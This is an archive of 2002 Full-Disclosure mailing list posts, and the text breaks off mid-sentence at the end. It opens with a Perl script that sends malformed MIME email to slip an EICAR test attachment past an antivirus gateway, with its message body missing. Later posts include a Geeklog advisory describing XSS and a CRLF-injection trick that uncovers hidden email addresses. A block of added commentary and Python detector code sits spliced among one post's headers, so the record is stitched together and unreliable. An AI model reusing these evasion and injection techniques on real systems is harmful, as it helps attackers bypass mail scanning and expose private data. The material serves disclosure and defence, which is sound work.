# The following code generates a malformed email with an EICAR attachment (False Virus).
# The vulnerability has been found to be present in TrendMicro's VirusWall, and has been now patched.
# Refer to http://solutionbank.antivirus.com/solutions/solutionsearch.asp solution ID 11948
#
# BeyondSecurity's SecurITeam, Copyrighted Material, for Testing Purposes only. For more information see:
# http://www.securiteam.com/securitynews/5KP000A7QE.html

use Getopt::Std;
use IO::Socket::INET;

getopt('tfhvsb');

if (!$opt_f || !$opt_t || !$opt_h) {
    print "Usage: malformed_email.pl <-t to> <-f from> <-h smtphost> [-v variant] [-s subject] [-b text]\n";
    print "Variants:\n(1) Content-Type\n(2) Content Transfer Encoding\n(3) Boundary Space (trailing)\n(4) Boundary Space (prefix)\n";
    exit;
}

$sock = IO::Socket::INET->new(PeerAddr => "$opt_h", PeerPort => '25', Proto => 'tcp');
die "Cannot connect to $opt_h:25: $!" unless $sock;

# Plain SMTP envelope; each server reply is checked for the expected status code.
unless (<$sock> =~ "220") { die "Not a SMTP Server?" }
print $sock "HELO you\r\n";
unless (<$sock> =~ "250") { die "HELO failed" }
print $sock "MAIL FROM:<$opt_f>\r\n";
unless (<$sock> =~ "250") { die "MAIL FROM failed" }
print $sock "RCPT TO:<$opt_t>\r\n";
unless (<$sock> =~ "250") { die "RCPT TO failed" }
print $sock "DATA\r\n";
unless (<$sock> =~ "354") { die "DATA failed" }

# Variant 1: a space before the colon of the Content-Type header.
if ($opt_v eq "1") { $content_type = "Content-Type :"; }
else { $content_type = "Content-Type:"; }

# Variant 2: a space before the colon of the Content-Transfer-Encoding header.
if ($opt_v eq "2") { $content_transfer_encoding = "Content-Transfer-Encoding :"; }
else { $content_transfer_encoding = "Content-Transfer-Encoding:"; }

# Variant 3: trailing space after an unquoted boundary; variant 4: space after "boundary=".
if ($opt_v eq "3") { $boundary = "boundary=----=_NextPart_000_000E_01C2100B.F369D840 "; }
elsif ($opt_v eq "4") { $boundary = "boundary= ----=_NextPart_000_000E_01C2100B.F369D840"; }
else { $boundary = "boundary=\"----=_NextPart_000_000E_01C2100B.F369D840\""; }

# The message text that followed here (the MIME headers built from the three
# variables above, the EICAR attachment and the closing "\r\n.\r\n") did not
# survive the archive rendering; only "print $sock <" remained of the heredoc.
print $sock <<EOF;
EOF

$a = <$sock>;
print "$a\n";
close($sock);

Additional Information:
The information has been provided by SecurITeam Experts.

-----

Thanks
Noam Rathaus
CTO
Beyond Security Ltd.
http://www.BeyondSecurity.com
http://www.SecuriTeam.com

From hggdh at attbi.com Thu Jul 18 14:39:37 2002
From: hggdh at attbi.com (HggdH)
Date: Thu, 18 Jul 2002 07:39:37 -0600
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others..
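Each of the four variants in the SecuriTeam advisory above changes nothing but white space in a MIME header (a blank before the colon, a blank after "boundary=", a trailing blank on an unquoted boundary), and that was enough for the vulnerable VirusWall builds to let the EICAR attachment through. The following Python is an added example, not SecuriTeam's code: a pre-scan check a gateway could run to refuse such messages outright (the "stop malformed emails" behaviour the advisory mentions for 5.1), flagging those malformations in every header block of a raw message; the sample messages and their boundary string are constructed here.

```python
"""Flag the header-spacing malformations the VirusWall exploit variants use.

Added example, not SecuriTeam's code. It inspects every header block of a
raw RFC 822 message (the top-level one and each block that follows a '--'
MIME delimiter line) and names which of the four malformations it contains.
"""
import re
from typing import Iterator, List

# A header field name is printable US-ASCII with no ':' and no white space
# (RFC 5322 3.6.8). Group 2 captures the blank run before the colon that
# exploit variants 1 and 2 insert ("Content-Type :").
_HEADER_LINE = re.compile(r'^([!-9;-~]+)([ \t]*):')
# Variant 4: white space between "boundary=" and the value.
_BOUNDARY_SPACE_AFTER_EQ = re.compile(r'boundary=[ \t]+', re.I)
# Variant 3: unquoted boundary value followed by trailing white space.
_BOUNDARY_TRAILING_SPACE = re.compile(r'boundary=([^"\s;]+)[ \t]+(?:;|$)', re.I)


def _header_blocks(raw: str) -> Iterator[List[str]]:
    """Yield unfolded header blocks; a run after a '--' line that contains
    any non-header line (ordinary body text, a signature) is not a block."""
    lines = raw.replace('\r\n', '\n').split('\n')
    i = 0
    while i < len(lines):
        if i == 0 or lines[i - 1].startswith('--'):
            block: List[str] = []
            header_shaped = True
            while i < len(lines) and lines[i] != '':
                line = lines[i]
                if line[:1] in (' ', '\t') and block:
                    # Unfold a continuation line but keep its trailing
                    # blanks: that is exactly where variant 3 hides one.
                    block[-1] += ' ' + line.lstrip()
                elif _HEADER_LINE.match(line):
                    block.append(line)
                else:
                    header_shaped = False
                i += 1
            if block and header_shaped:
                yield block
        i += 1


def mime_header_anomalies(raw: str) -> List[str]:
    """Return one finding per malformed header; an empty list means clean."""
    findings: List[str] = []
    for block in _header_blocks(raw):
        for line in block:
            name, gap = _HEADER_LINE.match(line).groups()
            if gap:
                findings.append(f'space-before-colon:{name}')
            if _BOUNDARY_SPACE_AFTER_EQ.search(line):
                findings.append('boundary-space-after-equals')
            if _BOUNDARY_TRAILING_SPACE.search(line):
                findings.append('boundary-trailing-space')
    return findings


def build_sample(variant: int) -> str:
    """Constructed two-part message: variant 0 is well formed, 1-4 mirror the
    advisory's exploit variants. The attachment body is harmless filler."""
    ctype = 'Content-Type :' if variant == 1 else 'Content-Type:'
    cte = 'Content-Transfer-Encoding :' if variant == 2 else 'Content-Transfer-Encoding:'
    b = '----=_Part_constructed_0001'          # constructed boundary string
    if variant == 3:
        boundary = f'boundary={b} '             # trailing blank, unquoted
    elif variant == 4:
        boundary = f'boundary= {b}'             # blank after the equals sign
    else:
        boundary = f'boundary="{b}"'
    return '\r\n'.join([
        'From: sender@example.invalid',
        'To: recipient@example.invalid',
        'Subject: constructed sample',
        'MIME-Version: 1.0',
        f'{ctype} multipart/mixed;',
        f'\t{boundary}',                        # folded parameter line
        '',
        f'--{b}',
        'Content-Type: text/plain; charset=us-ascii',
        '',
        'body text',
        '',
        f'--{b}',
        'Content-Type: application/octet-stream; name="test.com"',
        f'{cte} base64',
        'Content-Disposition: attachment; filename="test.com"',
        '',
        'Y29uc3RydWN0ZWQgYXR0YWNobWVudA==',     # base64 of "constructed attachment"
        '',
        f'--{b}--',
        '',
    ])


if __name__ == '__main__':
    for v in range(5):
        print(f'variant {v}: {mime_header_anomalies(build_sample(v)) or "clean"}')
```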
References: <20020717223238.A37D136F9@sitemail.everyone.net>
Message-ID: <004501c22e60$8fc33bb0$3264a8c0@local>

From: "Muhammad Faisal Rauf Danka"
Sent: Wednesday, July 17, 2002 16:32
Subject: Re: [Full-Disclosure] Symantec Buys SecurityFocus, among others..

(snip)

. I mean what do they mean by the vulnerabilities they find ?

I think we are talking about two different things here -- vulnerabilities reported via BUGTRAQ, and vulnerabilities found elsewhere (internal research, privileged access, whatever).

Vulnerabilities reported via BUGTRAQ will still be published on BUGTRAQ, in the same timely way it has always been. The others... they might take longer to make it to BUGTRAQ. This is actually not different from what most of those here (us?) do -- when we receive privileged information on a vulnerability (or when we find one), most of us will maintain secrecy for some time -- so that we can contact the vendor, work out a bypass, play at being a black hat, whatever. At least, we will NOT publish it until we can verify its authenticity.

. What they do is just moderate the damn list, and stop slipping useful
. vulnerability details about Microsoft and alike.. wtf?

Hold the fire, folks. Make sure it is an enemy you are firing on. Give them time. Symantec is a business, yes, but being a business is not identical to being stupid. The value of BUGTRAQ lies in its history of being fair. Elias, and now Dave, have always done a very good job on the moderation. We may not always agree with them (I myself have had -- under other incarnations -- difference on points of view with Elias), but it is their right, since they are the moderators.

(snip)

. looks like another one bites the dust.

Again, please remember -- if Symantec decides to censor BUGTRAQ... they will have killed it in a more effective way than any other. BUGTRAQ is followed not because it is SecurityFocus, but because it is BUGTRAQ.
If BUGTRAQ will bite the dust, or not, will (hopefully) depend on what Symantec forces in. I certainly hope it will not die because of what one thinks it is, or is not. This would be pure prejudice.

..hggdh..

From emoyle at scsnet.csc.com Thu Jul 18 14:58:03 2002
From: emoyle at scsnet.csc.com (Ed Moyle)
Date: Thu, 18 Jul 2002 09:58:03 -0400
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others..
Message-ID: <3BD76687A1CBD74097E37CB67263AE973559AD@scsetbmail.scsnet.csc.com>

On Thursday, July 18, 2002 09:40, HggdH [mailto:hggdh at attbi.com] wrote:
> Again, please remember -- if Symantec decides to censor BUGTRAQ... they will
> have killed it in a more effective way than any other. BUGTRAQ is followed
> not because it is SecurityFocus, but because it is BUGTRAQ. If BUGTRAQ will
> bite the dust, or not, will (hopefully) depend on what Symantec forces in. I
> certainly hope it will not die because of what one thinks it is, or is not.
> This would be pure prejudice.

In my humble opinion, it seems like it could be a major conflict of interest to have the primary vulnerability reporting outlet controlled by a party who also makes vulnerability scanning and intrusion detection products. This has always been the case under SF, but it is *really* bad now. Note that Symantec also announced purchases of Riptech and Recourse yesterday. It would seem that Symantec would have an edge in updating their product line before competitors have a chance to update theirs...

Also, not to be cynical, but they have an economic incentive to "play games" with vulnerabilities reported through outlets they control (keep in mind that there are no guarantees about timeliness with respect to when the moderator must act on messages.) I'm not saying they would do this; I'm just saying that they would have economic incentive to do so.
Throughout the years, I have always used BugTraq as a means to "give back" to the community; I do not appreciate my gift of free research to the community being used to make other people money. Something needs to be done. Hopefully, this list is the answer.

-E

From pauls at utdallas.edu Thu Jul 18 15:49:53 2002
From: pauls at utdallas.edu (Schmehl, Paul L)
Date: Thu, 18 Jul 2002 09:49:53 -0500
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others..
Message-ID: <871080DEC5874D41B4E3AFC5C400611E026EEF47@UTDEVS02.campus.ad.utdallas.edu>

Does anyone here think NTBUGTRAQ is a better list since TruSecure bought it? The same will happen to bugtraq. Mark my words. The launching of this list could not have been more timely.

Paul Schmehl (pauls at utdallas.edu)
Supervisor of Support Services
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/~pauls/

From hellnbak at nmrc.org Thu Jul 18 18:01:24 2002
From: hellnbak at nmrc.org (hellNbak)
Date: Thu, 18 Jul 2002 13:01:24 -0400 (EDT)
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others..
In-Reply-To: <871080DEC5874D41B4E3AFC5C400611E026EEF47@UTDEVS02.campus.ad.utdallas.edu>
Message-ID:

NTBugtraq started sliding downhill long before TruSecure bought it. Russ' ego is what dragged that list down, and TruSecure bought into the whole surgeon general BS and fed it even more.

On Thu, 18 Jul 2002, Schmehl, Paul L wrote:
> Date: Thu, 18 Jul 2002 09:49:53 -0500
> From: "Schmehl, Paul L"
> Reply-To: full-disclosure at lists.netsys.com
> To: full-disclosure at lists.netsys.com
> Subject: RE: [Full-Disclosure] Symantec Buys SecurityFocus, among others..
>
> Does anyone here think NTBUGTRAQ is a better list since TruSecure bought
> it? The same will happen to bugtraq. Mark my words. The launching of
> this list could not have been more timely.
>
> Paul Schmehl (pauls at utdallas.edu)
> Supervisor of Support Services
> The University of Texas at Dallas
> AVIEN Founding Member
> http://www.utdallas.edu/~pauls/
>

--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
"I don't intend to offend, I offend with my intent"
hellNbak at nmrc.org
http://www.nmrc.org/~hellnbak
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

From core at bokeoa.com Thu Jul 18 21:56:52 2002
From: core at bokeoa.com (Charles 'core' Stevenson)
Date: Thu, 18 Jul 2002 14:56:52 -0600
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others....
References:
Message-ID: <3D372B94.5050905@bokeoa.com>

Jay,

> Perhaps the best way to beat these cash hounds at their own game
> is to start using a strictly not-for-profit licensing on all released
> advisories and proof-of-concept code which stipulates that for-profit
> companies may not use said information in any way.

That's exactly what needs to happen :)

> Let's face it: the for-profit companies have been leeching off the
> community for years and giving nothing back save for sponsorship of key
> escrow, further draconian legislation, and advocacy of a security cabal
> (which they would control) that would take free information and bundle it
> as a pay-for product/service.

Amen.

> Look, I have nothing against someone trying to make a buck. That
> is the cornerstone of the capitalist system. What burns my biscuits is
> that the monolithic security companies are not making this money off their
> own efforts[1], but by leeching off the egalitarian contributions of those
> who possess a skill set the businesses are not willing to pay for.

Well said! I'm not sure I really have much to say except yes yes yes!

peace,
core

> - -Jay
>
> 1.
> About the only real effort I see from corporate security firms these
> days is whipping up FUD-filled press releases to scare the living
> bejeezus out of the masses about "cyber-terrorism" and other happy
> horseshit.
>
>     (   (                                                      _______
>      ))  ))   .--"There's always time for a good cup of coffee"--.   >====<--.
>    C|~~|C|~~| (>------ Jay D. Dyson -- jdyson at treachery.net ------<) |    = |-'
>     `--' `--'  `-- I'll be diplomatic...when I run out of ammo. --'  `------'
>

From emoyle at scsnet.csc.com Thu Jul 18 22:13:07 2002
From: emoyle at scsnet.csc.com (Ed Moyle)
Date: Thu, 18 Jul 2002 17:13:07 -0400
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others....
Message-ID: <3BD76687A1CBD74097E37CB67263AE97010278AA@scsetbmail.scsnet.csc.com>

On Thursday, July 18, 2002 16:39, Jay D. Dyson [mailto:jdyson at treachery.net] wrote:
> Perhaps the best way to beat these cash hounds at their own game
> is to start using a strictly not-for-profit licensing on all released
> advisories and proof-of-concept code which stipulates that for-profit
> companies may not use said information in any way.

Allow me to recommend the use of a trivial encryption algorithm to protect exploits and advisories such that any for-profit company must circumvent it in order to use it for their own purposes. Perhaps distribute advisories with the "do not copy" flag set on a .pdf.
This would give DMCA protection to the copyright and allow researchers to sue if their "protection measures" are circumvented by companies looking to make money off of the research.

-E

From nexus at patrol.i-way.co.uk Thu Jul 18 22:25:29 2002
From: nexus at patrol.i-way.co.uk (Nexus)
Date: Thu, 18 Jul 2002 22:25:29 +0100
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others....
References:
Message-ID: <002501c22ea1$a43bccb0$1e01320a@drizzt>

----- Original Message -----
From: "Jay D. Dyson"
To:
Sent: Thursday, July 18, 2002 9:39 PM
Subject: Re: [Full-Disclosure] Symantec Buys SecurityFocus, among others....

[snip]
> Indeed. And many of us did see this coming...yet few did anything
> about it. Thankfully, VulnWatch and this list exist and may well help
> break the inevitable stranglehold that's coming our way.
[snip]

I'm also wondering what will happen to the pretty extensive vulnerability database et al? Pay per sploit? ;-)

Cheers,
JJ

From mxe20 at psu.edu Thu Jul 18 22:58:11 2002
From: mxe20 at psu.edu (Mark Earnest)
Date: Thu, 18 Jul 2002 17:58:11 -0400 (EDT)
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others....
In-Reply-To: <3BD76687A1CBD74097E37CB67263AE97010278AA@scsetbmail.scsnet.csc.com>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Thu, 18 Jul 2002, Ed Moyle wrote:
> Allow me to recommend the use of a trivial encryption algorithm to protect
> exploits and advisories such that any for-profit company must circumvent
> it in order to use it for their own purposes. Perhaps distribute advisories
> with the "do not copy" flag set on a .pdf. This would give DMCA protection
> to the copyright and allow researchers to sue if their "protection measures"
> are circumvented by companies looking to make money off of the research.

That sounds good in theory, but in practice any sizable company would devour us, regardless of what the law says. The law is immaterial next to money.
- --
Mark Earnest
~~~~~~~~~~~~
Senior Systems Programmer
ASET/Emerging Technologies
Penn State University
Email: mxe20 at psu.edu
Office Phone: 814-863-2064
Public Key - http://mearnest.oas.psu.edu/gpgkey.txt

From BlueBoar at thievco.com Thu Jul 18 23:29:30 2002
From: BlueBoar at thievco.com (Blue Boar)
Date: Thu, 18 Jul 2002 15:29:30 -0700
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others....
References:
Message-ID: <3D37414A.6000509@thievco.com>

Jay D. Dyson wrote:
> Perhaps the best way to beat these cash hounds at their own game
> is to start using a strictly not-for-profit licensing on all released
> advisories and proof-of-concept code which stipulates that for-profit
> companies may not use said information in any way.

Interesting concept. How do you propose to copyright an idea? You can decline to let someone mirror your exploit or advisory verbatim, but there's nothing you can do to keep someone from reporting about a vulnerability.

BB

From madduck at madduck.net Thu Jul 18 23:49:08 2002
From: madduck at madduck.net (martin f krafft)
Date: Fri, 19 Jul 2002 00:49:08 +0200
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others....
In-Reply-To: <3BD76687A1CBD74097E37CB67263AE97010278AA@scsetbmail.scsnet.csc.com>
References: <3BD76687A1CBD74097E37CB67263AE97010278AA@scsetbmail.scsnet.csc.com>
Message-ID: <20020718224908.GD3763@fishbowl.madduck.net>

also sprach Ed Moyle [2002.07.18.2313 +0200]:
> Allow me to recommend the use of a trivial encryption algorithm to protect
> exploits and advisories such that any for-profit company must circumvent
> it in order to use it for their own purposes. Perhaps distribute advisories
> with the "do not copy" flag set on a .pdf.
> This would give DMCA protection
> to the copyright and allow researchers to sue if their "protection measures"
> are circumvented by companies looking to make money off of the research.

Say Symantec were to use such a document, one that I created in the sweat of my singletude. Do you think I'd have *any* chance on claiming my rights???

--
martin;              (greetings from the heart of the sun.)
  \____ echo mailto: !#^."<*>"|tr "<*> mailto:" net at madduck

1-800-psych: hello, welcome to the psychiatric hotline.
if you have multiple personalities, please press 3, 4, 5 and 6.

From madduck at madduck.net Thu Jul 18 23:51:27 2002
From: madduck at madduck.net (martin f krafft)
Date: Fri, 19 Jul 2002 00:51:27 +0200
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others....
In-Reply-To:
References: <00fd01c22dd5$2c2436d0$f954b8a1@entrenchtech.com>
Message-ID: <20020718225127.GE3763@fishbowl.madduck.net>

also sprach Jay D. Dyson [2002.07.18.2239 +0200]:
> Indeed. And many of us did see this coming...yet few did anything
> about it. Thankfully, VulnWatch and this list exist and may well help
> break the inevitable stranglehold that's coming our way.

How many people are we by now?

> Look, I have nothing against someone trying to make a buck. That
> is the cornerstone of the capitalist system. What burns my biscuits is
> that the monolithic security companies are not making this money off their
> own efforts[1], but by leeching off the egalitarian contributions of those
> who possess a skill set the businesses are not willing to pay for.

Right on. Let's just stick to this forum and not use Bugtraq anymore.
Or make your vulnerabilities available here 2 days before you post to bugtraq (moderation only takes a day).

--
martin;              (greetings from the heart of the sun.)
  \____ echo mailto: !#^."<*>"|tr "<*> mailto:" net at madduck

if you don't understand or are scared by any of the above ask your parents or an adult to help you.

From madduck at madduck.net Thu Jul 18 23:52:23 2002
From: madduck at madduck.net (martin f krafft)
Date: Fri, 19 Jul 2002 00:52:23 +0200
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others....
In-Reply-To: <002501c22ea1$a43bccb0$1e01320a@drizzt>
References: <002501c22ea1$a43bccb0$1e01320a@drizzt>
Message-ID: <20020718225223.GF3763@fishbowl.madduck.net>

also sprach Nexus [2002.07.18.2325 +0200]:
> I'm also wondering what will happen to the pretty extensive vulnerability
> database et al ?

Is there anyone with the capabilities to extract a mirror? (I'd notify webmaster@ before doing so...) I can't provide the bandwidth or server space, unfortunately...

--
martin;              (greetings from the heart of the sun.)
  \____ echo mailto: !#^."<*>"|tr "<*> mailto:" net at madduck

you're in college. you've made a mistake.

From Eric.Nelson at viacore.net Fri Jul 19 00:29:35 2002
From: Eric.Nelson at viacore.net (Eric Nelson)
Date: Thu, 18 Jul 2002 16:29:35 -0700
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others....
Message-ID:

What about publishing and copyrighting the exploit?
It's more legal ammo to go after whoever uses it for malicious purposes. Of course this doesn't *stop* the use of the exploit (discourages perhaps?), it just increases the penalties when one gets caught using it.

-Eric

On Thu, 18 Jul 2002, Blue Boar wrote:
> > Perhaps the best way to beat these cash hounds at their own game
> > is to start using a strictly not-for-profit licensing on all released
> > advisories and proof-of-concept code which stipulates that for-profit
> > companies may not use said information in any way.
>
> Interesting concept. How do you propose to copyright an idea?

The idea cannot be copyrighted[1], but the code (which includes the exploit methodology) can be copyrighted with all the cursory terms and conditions for use.

> You can decline to let someone mirror your exploit or advisory verbatim,
> but there's nothing you can do to keep someone from reporting about a
> vulnerability.

Sure you can...especially under the auspices of the DMCA. Hell, when you get down to it, all we need is one wild-eyed lawyer[2] on our side who'll toss a flurry of lawsuits and we'll pretty much have the corporate security firms by the short-and-curlies.

All kidding aside, I like the notion of encrypting the data and putting stipulations on the decryption. Seems rather like poetic justice to me. Call it the Sklyarov cipher...

- -Jay

1. Ideas, names and phrases can be trademarked, however.

2. Maybe one with experience via the Church of Scientology, or the one who brought us McDonald's coffee cups that now read "Allow to cool before applying to genitals"...

    (   (                                                      _______
     ))  ))   .--"There's always time for a good cup of coffee"--.   >====<--.
   C|~~|C|~~| (>------ Jay D. Dyson -- jdyson at treachery.net ------<) |    = |-'
    `--' `--'  `-- I'll be diplomatic...when I run out of ammo. --'  `------'
iD8DBQE9N0pAGI2IHblM+8ERAlAnAJ9AbZ/g4I5cPUL3KogHYDjQK5p4VgCeN1pY
Q9sVUOYHOhysxYYetRqAzCo=
=+6qq
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Full-Disclosure at lists.netsys.com
http://lists.netsys.com/mailman/listinfo/full-disclosure

From gdd at siliconinc.net Fri Jul 19 00:42:18 2002
From: gdd at siliconinc.net (gdd at siliconinc.net)
Date: Thu, 18 Jul 2002 19:42:18 -0400
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others....
In-Reply-To: <20020718225223.GF3763@fishbowl.madduck.net>
References: <002501c22ea1$a43bccb0$1e01320a@drizzt> <20020718225223.GF3763@fishbowl.madduck.net>
Message-ID: <20020718194218.A4201@siliconinc.net>

On Fri, Jul 19, 2002 at 12:52:23AM +0200, martin f krafft wrote:
> Is there anyone with the capabilities to extract a mirror?
> (I'd notify webmaster@ before doing so...)

A friend of mine already mirrored it. I'm not sure as to how well it turned out since I haven't had a chance to look at it yet, but it appears that everything is there. A dump of whatever database it's in would be a much nicer method of doing this.

> I can't provide the bandwidth or server space, unfortunately...

I can provide both the bandwidth and server space, but what would the legal issues be with mirroring it? My lawyer won't even offer any advice on this one. Suggestions/advice anyone?

gdd at siliconinc.net

From BlueBoar at thievco.com Fri Jul 19 01:02:25 2002
From: BlueBoar at thievco.com (Blue Boar)
Date: Thu, 18 Jul 2002 17:02:25 -0700
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others....
References:
Message-ID: <3D375711.3020903@thievco.com>

Jay D. Dyson wrote:
> The idea cannot be copyrighted[1], but the code (which includes
> the exploit methodology) can be copyrighted with all the cursory terms
> and conditions for use.

You can't copyright an algorithm, only an implementation. You need a patent to protect an algorithm. Good luck patenting buffer overflows.
>>You can decline to let someone mirror your exploit or advisory verbatim, >>but there's nothing you can do to keep someone from reporting about a >>vulnerability. > Sure you can...especially under the auspices of the DMCA. Hell, > when you get down to it, all we need is one wild-eyed lawyer[2] on our > side who'll toss a flurry of lawsuits and we'll pretty much have the > corporate security firms by the short-and-curlies. You think you can stop a news agency from reporting that there is a vulnerability in product X, that works like Y and Z? I think you'll find you're mistaken. I'd love to see it play out, though. > 1. Ideas, names and phrases can be trademarked, however. Not ideas. Names, yes.. but that just means someone has to call their version of the exploit something different. And trademarks are expensive to obtain and defend. > > 2. Maybe one with experience via the Church of Scientology, or the one > who brought us McDonald's coffee cups that now read "Allow to cool > before applying to genitals"... Many people can be intimidated with a lawsuit. Seems like the groups in particular you are concerned about aren't the ones to try threatening with lawyers, though. BB From nick at virus-l.demon.co.uk Fri Jul 19 01:23:10 2002 From: nick at virus-l.demon.co.uk (Nick FitzGerald) Date: Fri, 19 Jul 2002 12:23:10 +1200 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others. In-Reply-To: <3D375711.3020903@thievco.com> Message-ID: <0GZG00C4AZQK0C@smtp2.clear.net.nz> Blue Boar replied to Jay D. Dyson: > > The idea cannot be copyrighted[1], but the code (which includes > > the exploit methodology) can be copyrighted with all the cursory terms > > and conditions for use. > > You can't copyright an algorithm, only an implementation. You need a > patent to protect an algorithm. Good luck patenting buffer overflows. 
> > >>You can decline to let someone mirror your exploit or advisory verbatim,
> >>but there's nothing you can do to keep someone from reporting about a
> >>vulnerability.
> > Sure you can...especially under the auspices of the DMCA. Hell,
> > when you get down to it, all we need is one wild-eyed lawyer[2] on our
> > side who'll toss a flurry of lawsuits and we'll pretty much have the
> > corporate security firms by the short-and-curlies.
>
> You think you can stop a news agency from reporting that there is a
> vulnerability in product X, that works like Y and Z? I think you'll find
> you're mistaken. I'd love to see it play out, though.
>
> > 1. Ideas, names and phrases can be trademarked, however.
>
> Not ideas. Names, yes.. but that just means someone has to call their
> version of the exploit something different. And trademarks are expensive
> to obtain and defend.

Release exploits with the vaguest of descriptions as to how they work (lost for examples -- just copy'n'paste the "technical bits" of some of the security bulletins from MS...). Have the _only_ PoC code a compiled binary loaded with copyright notices forbidding reversing, etc. Be sure to use some "encryption" (extremely trivial is OK as complexity doesn't matter; can you say XOR?) in the PoC to "protect" the important secret (generally the overflow "string" itself). Be capricious in who you prosecute under the DMCA for incorporating vulnerability detection of this flaw into their products. (Many other "pro-reversing" laws allow reversing if doing so is the only (practical) way to ensure compatibility or system inter-operation -- this should not be a defense against reversing a security vulnerability exploit...)

> Many people can be intimidated with a lawsuit. Seems like the groups in
> particular you are concerned about aren't the ones to try threatening with
> lawyers, though.

Do you really care if you win lots of money in such a case, or just that you win?
I'm sure you'd find good lawyers who would take such cases on a "no win no fee" basis so long as they got a sizable chunk of ones they did win. They'd only have to win a few before you'd made your point.

Of course, IANAL...

Regards,

Nick FitzGerald

From ulfh at update.uu.se Fri Jul 19 01:23:52 2002
From: ulfh at update.uu.se (Ulf Harnhammar)
Date: Fri, 19 Jul 2002 02:23:52 +0200 (CEST)
Subject: [Full-Disclosure] Geeklog XSS and CRLF Injection
Message-ID:

Geeklog XSS and CRLF Injection

PROGRAM: Geeklog
VENDOR: Tony Bibbs et al.
HOMEPAGE: http://geeklog.sourceforge.net/
VULNERABLE VERSIONS: 1.3.5sr1, possibly earlier versions as well
NOT VULNERABLE VERSIONS: 1.3.5sr2
LOGIN REQUIRED: no
SEVERITY: high

DESCRIPTION:

"Geeklog is a 'blog', otherwise known as a Weblog. It allows you to create your own virtual community area, complete with user administration, story posting, messaging, comments, polls, calendar, weblinks, and more! It can run on many different operating systems, and uses PHP4 and MySQL." (direct quote from the program's homepage)

Geeklog is published under the terms of the GNU General Public License.

SECURITY HOLES:

1) Geeklog has got an XSS hole that affects both the stories and the comments. The program removes the HTML elements that are used for scripting, but it fails to remove the HTML attributes that are used for the same purpose, which leads to this hole.

One example of an XSS attack would be:

life has made her that much bolder now

When a victim moves the mouse pointer over the quote from "Lady Godiva's Operation", an intrinsic event occurs and the JavaScript code is executed.

(There is also an XSS issue in the search engine. It was reported by ?ome1, and not by me.)

2) Geeklog has got a CRLF Injection hole in User Profile: Send Email. The users' mail addresses are meant to be secret, but by using this hole, you can get someone's mail address anyway.

The problem is that you can add extra mail headers, by using a CRLF combination followed by an extra mail header in the Subject field. One way to add them is saving the HTML document with the form, and changing the tag to a textarea. After opening the edited document in a web browser, you enter a Subject line in the textarea, press Enter, and then you enter your extra mail header. When the mail is sent, that header will be included. If the header in question is "Bcc: ", the message will silently be copied to you, thus revealing the recipient's mail address without them knowing.

I have described this type of problem in further detail in my "CRLF Injection" paper, which is available at http://cert.uni-stuttgart.de/archive/bugtraq/2002/05/msg00079.html

COMMUNICATION WITH VENDOR:

The vendor was contacted on the 1st of July. Version 1.3.5sr2, which does not have any of these security holes (neither mine nor ?ome1's), was released on the 9th of July.

RECOMMENDATION:

I recommend that all administrators upgrade to version 1.3.5sr2.

// Ulf Harnhammar
ulfh at update.uu.se

From johnc at grok.org.uk Fri Jul 19 01:24:45 2002
From: johnc at grok.org.uk (John Cartwright)
Date: Fri, 19 Jul 2002 01:24:45 +0100
Subject: [Full-Disclosure] Copyright Notices
Message-ID: <20020719002445.GA23004@www1.grok.org.uk>

Hi

Some interesting debate about the whole copyright issue going on... We were wondering about appending some kind of statement to posts to back up these points. IANAL, but what do you think of a statement such as this:

"The above post and all elements thereof are copyrighted by the poster, and may not be reproduced or used for any commercial purpose without the express permission of the author, unless specified otherwise."

Obviously by posting you have to agree that
a) Other members might quote what you said in *their* posts.
b) It will all end up in the list archives.

Alternatively we could spell out the situation in the list charter and point to it in the footer to save room.
We'd welcome your comments. - John From smkelly at zombie.org Fri Jul 19 01:38:30 2002 From: smkelly at zombie.org (Sean Kelly) Date: Thu, 18 Jul 2002 19:38:30 -0500 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... In-Reply-To: <3D372B94.5050905@bokeoa.com> References: <3D372B94.5050905@bokeoa.com> Message-ID: <20020719003830.GA34944@edgemaster.zombie.org> On Thu, Jul 18, 2002 at 02:56:52PM -0600, Charles 'core' Stevenson wrote: > Jay, ... > That's exactly what needs to happen :) ... > Amen. ... > Well said! I'm not sure I really have much to say except yes yes yes! I joined this list to see if it would serve any supplemental value to Bugtraq and the other security-related resources out there. So far, all I see is politics and criticism of Symantec and SecurityFocus. Am I mistaken that this list was intended (and spammed/advertised) to be for full disclosure security issues? If I am not mistaken, could such politics related stuff be moved to a different list, as it seems to me that it is politics and commercialism that you are complaining about in the first place. In other words, can't we just move on with it and stay on topic of the list? Or was this list created to allow people to whine about SecurityFocus and Symantec? The answer to my question will assist me in my decision as to whether I should advocate this mailing list or not. Thanks, -- Sean Kelly | PGP KeyID: 77042C7B smkelly at zombie.org | http://www.zombie.org From steve at entrenchtech.com Fri Jul 19 01:45:21 2002 From: steve at entrenchtech.com (Steve) Date: Thu, 18 Jul 2002 18:45:21 -0600 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others. In-Reply-To: <0GZG00C4AZQK0C@smtp2.clear.net.nz> Message-ID: <002001c22ebd$92808cb0$6401a8c0@Laptop2> > Release exploits with the vaguest of descriptions as to how they work > (lost for 